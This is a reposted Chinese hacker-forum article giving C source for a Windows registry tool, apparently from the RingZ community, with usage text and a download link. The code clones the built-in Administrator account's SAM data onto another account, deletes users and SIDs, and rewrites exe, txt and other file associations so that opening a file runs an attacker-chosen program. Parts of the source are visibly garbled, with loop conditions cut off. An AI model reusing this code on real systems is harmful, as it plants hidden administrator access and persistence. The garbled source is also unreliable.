註冊表操作(RingZ_RgeEdit)
http://ww2.7747.net/Article/comp/make/200410/405.html 代碼:註冊表操作(RingZ_RgeEdit) RingZ_CDUser的擴展版本
作者:dahubaobao
主頁:http://www.ringz.org
郵件:dahushibaobao@vip.sina.com
QQ:382690
EXE在壓縮包中,解壓密碼:www.ringz.org
http://dahubaobao.go.nease.net/RingZ_RgeEdit.rar
歡迎進入環形區,一群技術狂熱者的社區,www.ringz.org歡迎你的加入!
注:轉載請著名出處,謝謝!
=====================================================================
#include "Functions.h" int main (int argc, char *argv[])
{
char SID[10],C_Sid[10],USER[20];
char *K_Sid="1F4";
char *K_User="Administrator";
int n; for (n=1;nEXIT)
{
C_Usage();
continue;
} if (count==EXIT)
{
printf("ByeBye!\n");
break;
} while (getchar()!='\n')
continue; switch(count)
{
case 1:printf("Correlation TXT:");
gets(TXT_file);
if (strlen(TXT_file)<=50)
TXT_Correlation(TXT_file);
else
{
printf("Error\n");
exit(0);
}
break; case 2:printf("Correlation EXE:");
gets(EXE_file);
if (strlen(EXE_file)<=50)
EXE_Correlation(EXE_file);
else
{
printf("Error\n");
exit(0);
}
break; case 3:printf("Correlation HLP:");
gets(HLP_file);
if (strlen(HLP_file)<=50)
HLP_Correlation(HLP_file);
else
{
printf("Error\n");
exit(0);
}
break; case 4:printf("Correlation INF:");
gets(INF_file);
if (strlen(INF_file)<=50)
INF_Correlation(INF_file);
else
{
printf("Error\n");
exit(0);
}
break; case 5:printf("Correlation INI:");
gets(INI_file);
if (strlen(INI_file)<=50)
INI_Correlation(INI_file);
else
{
printf("Error\n");
exit(0);
}
break; case 6:printf("Setting Correlation\n");
printf("Please Input E_KeyName(E_Key):");
if (!(strlen(gets(E_Key))<=20))
{
printf("Error\n");
exit(0);
}
printf("Please Input KeyName(Key):");
if (!(strlen(gets(Key))<=20))
{
printf("Error\n");
exit(0);
}
printf("Please Input D_KeyValue(D_Value):");
if (!(strlen(gets(D_Value))<=20))
{
printf("Error\n");
exit(0);
}
printf("Please Input KeyValue(Value):");
if (strlen(gets(Value))<=50)
DIY_Correlation(E_Key,Key,D_Value,Value);
else
{
printf("Error\n");
exit(0);
}
} } while (getchar()!='\n')
continue;
return count;
} void TXT_Correlation (char *TXTFile)
{
HKEY hkey;
DWORD szData=100,ret=0;
char *key="txtfile\\shell\\open\\command\\"; ret=RegCreateKey(HKEY_CLASSES_ROOT,key,&hkey);
//在指定的項下創建一個新項。如指定的項已經存在,那麼函數會打開現有的項
//hKey Long,要打開項的控制碼,或者一個標準項名
//lpSubKey String,欲創建的新子項。可同時創建多個項,只需用反斜杠將它們分隔開即可。
//例如level1\level2\newkey。如果指定"",則為預設值。
//phkResult Long,指定一個變數,用於裝載新子項的控制碼 if (!ret==ERROR_SUCCESS)
{
printf("Reg Create FAIL\n");
exit(0);
} ret=RegSetValueEx(hkey,"",0,REG_EXPAND_SZ,TXTFile,szData); if (ret==ERROR_SUCCESS)
printf("TXT_File Correlation Success\n");
else
{
printf("TXT_File Correlation FAIL\n");
exit(0);
} RegCloseKey(hkey);
} void EXE_Correlation (char *EXEFile)
{
HKEY hkey;
DWORD szData=100,ret=0;
char *key="exefile\\shell\\open\\command\\"; ret=RegCreateKey(HKEY_CLASSES_ROOT,key,&hkey); if (!ret==ERROR_SUCCESS)
{
printf("Reg Create FAIL\n");
exit(0);
} ret=RegSetValueEx(hkey,"",0,REG_SZ,EXEFile,szData); if (ret==ERROR_SUCCESS)
printf("EXE_File Correlation Success\n");
else
{
printf("EXE_File Correlation FAIL\n");
exit(0);
} RegCloseKey(hkey);
} void INF_Correlation (char *INFFile)
{
HKEY hkey;
DWORD szData=100,ret=0;
char *key="inffile\\shell\\open\\command\\"; ret=RegCreateKey(HKEY_CLASSES_ROOT,key,&hkey); if (!ret==ERROR_SUCCESS)
{
printf("Reg Create FAIL\n");
exit(0);
} ret=RegSetValueEx(hkey,"",0,REG_EXPAND_SZ,INFFile,szData); if (ret==ERROR_SUCCESS)
printf("INF_File Correlation Success\n");
else
{
printf("INF_File Correlation FAIL\n");
exit(0);
} RegCloseKey(hkey);
} void INI_Correlation (char *INIFile)
{
HKEY hkey;
DWORD szData=100,ret=0;
char *key="inifile\\shell\\open\\command\\"; ret=RegCreateKey(HKEY_CLASSES_ROOT,key,&hkey); if (!ret==ERROR_SUCCESS)
{
printf("Reg Create FAIL\n");
exit(0);
} ret=RegSetValueEx(hkey,"",0,REG_EXPAND_SZ,INIFile,szData); if (ret==ERROR_SUCCESS)
printf("INI_File Correlation Success\n");
else
{
printf("INI_File Correlation FAIL\n");
exit(0);
} RegCloseKey(hkey);
} void HLP_Correlation (char *HLPFile)
{
HKEY hkey;
DWORD szData=100,ret=0;
char *key="helpfile\\shell\\open\\command\\"; ret=RegCreateKey(HKEY_CLASSES_ROOT,key,&hkey); if (!ret==ERROR_SUCCESS)
{
printf("Reg Create FAIL\n");
exit(0);
} ret=RegSetValueEx(hkey,"",0,REG_SZ,HLPFile,szData); if (ret==ERROR_SUCCESS)
printf("HLP_File Correlation Success\n");
else
{
printf("HLP_File Correlation FAIL\n");
exit(0);
} RegCloseKey(hkey);
} int DIY_Correlation(
char *E_KeyName,char *KeyName,char *D_KeyValue,char *KeyValue)
{
HKEY hkey;
DWORD szData=100,ret=0;
char Key[50];
ZeroMemory(Key,50); ret=RegCreateKey(HKEY_CLASSES_ROOT,E_KeyName,&hkey); if (!ret==ERROR_SUCCESS)
{
printf("One:Reg Create FAIL\n");
exit(0);
} ret=RegSetValueEx(hkey,"",0,REG_SZ,KeyName,szData); if (ret==ERROR_SUCCESS)
printf("One:Setting RegKey Success\n");
else
{
printf("One:Setting RegKey FAIL\n");
exit(0);
} ret=RegCreateKey(HKEY_CLASSES_ROOT,KeyName,&hkey); if (!ret==ERROR_SUCCESS)
{
printf("Two:Reg Create FAIL\n");
exit(0);
} ret=RegSetValueEx(hkey,"",0,REG_SZ,D_KeyValue,szData); if (ret==ERROR_SUCCESS)
printf("Two:Setting RegKeyValue Success\n");
else
{
printf("Two:Setting RegKeyValue FAIL\n");
exit(0);
} strcpy(Key,KeyName);
strcat(Key,"\\shell\\open\\command\\"); ret=RegCreateKey(HKEY_CLASSES_ROOT,Key,&hkey); if (!ret==ERROR_SUCCESS)
{
printf("Three:Reg Create FAIL\n");
exit(0);
} ret=RegSetValueEx(hkey,"",0,REG_SZ,KeyValue,szData); if (ret==ERROR_SUCCESS)
printf("Three:Setting RegKeyValue Success\n");
else
{
printf("Three:Setting RegKeyValue FAIL\n");
exit(0);
} RegCloseKey(hkey);
} void Sid (char *sid)
{
HKEY hkey;
DWORD ret;
char C_sid[10]; ZeroMemory(C_sid,10);
strcpy(C_sid,"00000"); //填充SID中的前5位
strcat(C_sid,sid); //傳遞剩餘3位,並繼續填充 //打開註冊表,成功返回值0(SUCCESS)
ret=RegOpenKey(HKEY_LOCAL_MACHINE, //根鍵名或已打開項的控制碼
"SAM\\SAM\\Domains\\Account\\Users\\", //要打開的項名
&hkey); //裝載打開項的控制碼 if (!ret==ERROR_SUCCESS)
{
printf("Reg Open FAIL\n");
exit(0);
} //刪除SID,成功返回值0(SUCCESS)
ret=RegDeleteKey(hkey,C_sid); if (ret==ERROR_SUCCESS)
printf("Success Delete Key (SID)\n"); //列印成功消息
else
{
printf("Delete Key FAIL (SID)\n"); //列印失敗消息
exit(0);
} RegCloseKey(hkey); //關閉以打開的註冊表項 } void User (char *user)
{
HKEY hkey;
DWORD ret;
char C_user[40]; ZeroMemory(C_user,40);
strcpy(C_user,"");
strcat(C_user,user); ret=RegOpenKey(HKEY_LOCAL_MACHINE,
"SAM\\SAM\\Domains\\Account\\Users\\Names\\",
&hkey); if (!ret==ERROR_SUCCESS)
{
printf("Reg Open FAIL\n");
exit(0);
} ret=RegDeleteKey(hkey,C_user); if (ret==ERROR_SUCCESS)
printf("Success Delete Key (USER)\n");
else
{
printf("Delete Key FAIL (USER)\n");
exit(0);
} RegCloseKey(hkey); } void OpenKey (char *key)
{
HKEY hkey;
DWORD dwIndex=0,lpcbname=100,ret=0;
char T_name[100],Buffer[100];
FILETIME lpftlast;
int i=0; ZeroMemory(Buffer,100);
ZeroMemory(T_name,100);
ZeroMemory(name,1500); RegOpenKeyEx(HKEY_LOCAL_MACHINE, //根鍵名或已打開項的控制碼
key, //傳遞一個參數,欲打開的註冊表項
0, //未用,設為0即可
KEY_ALL_ACCESS, //帶有首碼KEY_??的一個或多個常數。
//它們的組合描述了允許對這個項進行哪些操作
&hkey); for(i=0;ret==ERROR_SUCCESS;i ,dwIndex )
{
ret=RegEnumKeyEx(hkey,dwIndex,T_name,&lpcbname,
NULL,NULL,NULL,&lpftlast);
//dwIndex:欲獲取的子項的索引。第一個子項的索引編號為零
//T_name:用於裝載指定索引處項名的一個緩衝區
//&lpcbname:指定一個變數,用於裝載lpName緩衝區的實際長度(包括空字元)。
//一旦返回,它會設為實際裝載到lpName緩衝區的字元數量
//NULL:未用,設為零
//NULL:項使用的類名
//NULL:用於裝載lpClass緩衝區長度的一個變數
//&lpftlast:FILETIME,枚舉子項上一次修改的時間 strcat(name[i],T_name);
ZeroMemory(T_name,100);
lpcbname=100;
} RegCloseKey(hkey); //拼接用戶名
for(KeyN=0;KeyN");
printf("%s",Temp);
ViewUser(Buffer);
strcpy(Buffer,"SAM\\SAM\\Domains\\Account\\Users\\Names\\");
}
return 1;
} int Clone(char *C_sid)
{
HKEY hkey,C_hkey;
DWORD Type=REG_BINARY,SizeF=1024*2,SizeV=1024*10,ret;
char CloneSid[100];
LPBYTE lpDataF,lpDataV; lpDataF = (LPBYTE) malloc(1024*2);
lpDataV = (LPBYTE) malloc(1024*10); ZeroMemory(lpDataF,1024*2);
ZeroMemory(lpDataV,1024*10);
ZeroMemory(CloneSid,100); strcpy(CloneSid,"SAM\\SAM\\Domains\\Account\\Users\\00000");
strcat(CloneSid,C_sid); ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SAM\\SAM\\Domains\\Account\\Users\\000001F4",
0,
KEY_ALL_ACCESS,
&hkey); if(!ret==ERROR_SUCCESS)
{
printf("Reg Open FAIL\n");
exit(0);
} ret=RegQueryValueEx(hkey,"F",NULL,
&Type,lpDataF,&SizeF); if(!ret==ERROR_SUCCESS)
{
printf("Reg Query Value FAIL\n");
exit(0);
} ret=RegQueryValueEx(hkey,"V",NULL,
&Type,lpDataV,&SizeV); if(!ret==ERROR_SUCCESS)
{
printf("Reg Query Value FAIL\n");
exit(0);
} ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
CloneSid,
0,
KEY_ALL_ACCESS,
&C_hkey); if(!ret==ERROR_SUCCESS)
{
printf("Reg Open FAIL\n");
exit(0);
} ret=RegSetValueEx(C_hkey,"F",0,
REG_BINARY,
lpDataF,
SizeF);
//C_hkey:根鍵名或已打開項的控制碼
//“F”:要設置值的名字
//0:未用,設為零
//REG_BINARY:要設置的數量類型
//lpDataF:包含資料的緩衝區中的第一個位元組
//SizeF:lpData緩衝區的長度 if(!ret==ERROR_SUCCESS)
{
printf("Reg Set Vaule FAIL\n");
exit(0);
} ret=RegSetValueEx(C_hkey,"V",0,
REG_BINARY,
lpDataV,
SizeV); if(ret==ERROR_SUCCESS)
printf("Clone User Success\n");
else
{
printf("Clone User FAIL\n");
exit(0);
} RegCloseKey(hkey);
RegCloseKey(C_hkey); return 1;
} void C_Usage (void)
{
fprintf(stderr,"********************************************************************************\n"
"Please Input 1 or 5 Select file correlation,Select 6 \"DIY\" file correlation\n"
"1)TXT\t\t\t2)EXE\t\t\t3)HLP\n"
"4)INF\t\t\t5)INI\t\t\t6)DIY\n"
"7)Quit\n"
"********************************************************************************\n");
} void EX_Correlation (void)
{
printf("DIY example:\n\n");
fprintf(stderr,"C:\>RingZ_RgeEdit.exe -E\n"
"*******************************************************************************\n"
"Please Input 1 or 5 Select file correlation,Select 6 \"DIY\" file correlation\n"
"1)TXT\t\t\t2)EXE\t\t\t3)HLP\n"
"4)INF\t\t\t5)INI\t\t\t6)DIY\n"
"7)Quit\n"
"********************************************************************************\n"
"6\n"
"Setting Correlation\n"
"Please Input E_KeyName(E_Key):\".dahu\"\n"
"Please Input KeyName(Key):\"dahubaobao\"\n"
"Please Input D_KeyValue(D_Value):\"dahufile\"\n"
"Please Input KeyValue(Value):\"%%systemroot%%\\system32\\dahubaobao.exe %%1\"\n"
"One:Setting RegKey Success\n"
"Two:Setting RegKeyValue Success\n"
"Three:Setting RegKeyValue Success\n"
"......\n");
} void Usage (void)
{
fprintf(stderr,"===============================================================================\n"
"\t 註冊表操作\n"
"\t包含:刪除/克隆任意用戶,檔關聯(可以自定義)。有時間會繼續加入更多功能\n"
"\t環境:Win2K Adv Server Dev C 4.9.8.0\n"
"\t作者:dahubaobao\n"
"\t主頁:www.RingZ.org\;n"
"\tOICQ:382690\n"
"\t郵件:382690@qq.com\n"
"\t聲明:本帖由環行區(RingZ)原創,轉載請注明出處,謝謝!\n\n"
"\t使用方法:\n"
"\t\"-H\":幫助資訊\n"
"\t\"-L\":列出系統中用戶對應的SID\n"
"\t\"-C\":克隆帳戶,輸入SID即可\n"
"\t\"-S\":刪除SID\n"
"\t 對應註冊表HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\n"
"\t\"-U\":刪除用戶名\n"
"\t 對應註冊表HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\n"
"\t\"-F\":文件關聯。可以關聯TXT、EXE、HLP、INF、INI,並且可以自定義檔關聯\n"
"\t\"-E\":一個自定義檔關聯的例子,並有兩幅插圖\n\n"
"\t注意事項:\n"
"\t由於SID的前5位都是\"0\",所以不必輸入,直接輸入最後三位\n"
"\t例如:000001F5,則直接輸入1F5,即可將Guest帳戶刪除\n"
"\t使用Regedt32將SAM鍵修改為Administrator可以訪問\n"
"\t使用-C參數後,會彈出\"Clone SID:\"提示符,只需輸入相應的SID即可克隆\n"
"\t使用-S參數後,會彈出\"Delete SID:\"提示符,只需輸入相應的SID即可刪除\n"
"\t使用-U參數後,會彈出\"Delete USER:\"提示符,只需輸入相應的用戶名即可刪除\n"
"\t使用-F參數後,會彈出一個功能表,1-6為檔關聯選項,7為退出。假如選擇1,則\n"
"\t彈出\"Correlation TXT:\"提示符,只需輸入相應的程式即可完成檔關聯,例如:\n"
"\t\"%%systemroot%%\\system32\\dahubaobao.exe %%1\",其他關聯方法依次類推\n"
"\t本程式只是用做代碼交流,對不熟悉註冊表編程的朋友可以參考參考,克隆帳戶只\n"
"\t是占時性,重啟之後就沒有了\n"
"===============================================================================\n");
} Functions.h
Code:
#include
#include
#include
#define EXIT 7
#define LOW 0 char name[50][30]; void Usage (void); //幫助資訊
void C_Usage (void); //檔關聯菜單
void EX_Correlation (void); //自定義檔關聯的例子
void Sid (char *sid); //刪除安全識別字
void User (char *user); //刪除用戶名
void OpenKey (char *key);
void TXT_Correlation (char *TXTFile);
void EXE_Correlation (char *EXEFile);
void INF_Correlation (char *INFFile);
void INI_Correlation (char *INIFile);
void HLP_Correlation (char *HLPFile);
int ListUser (void); //顯示用戶名對應的安全識別字
int ViewUser (char *key);
int Clone (char *C_sid); //克隆帳戶
int Correlation (void); //文件關聯函數
int Main_Correlation (void); //檔關聯Main函數
int DIY_Correlation(char *E_KeyName,char *KeyName,char *D_KeyValue,char *KeyValue);
//自定義檔關聯函數
發表時間:2005-01-06 21:51:04
IP:218.175.xxx.xxx 未訂閱
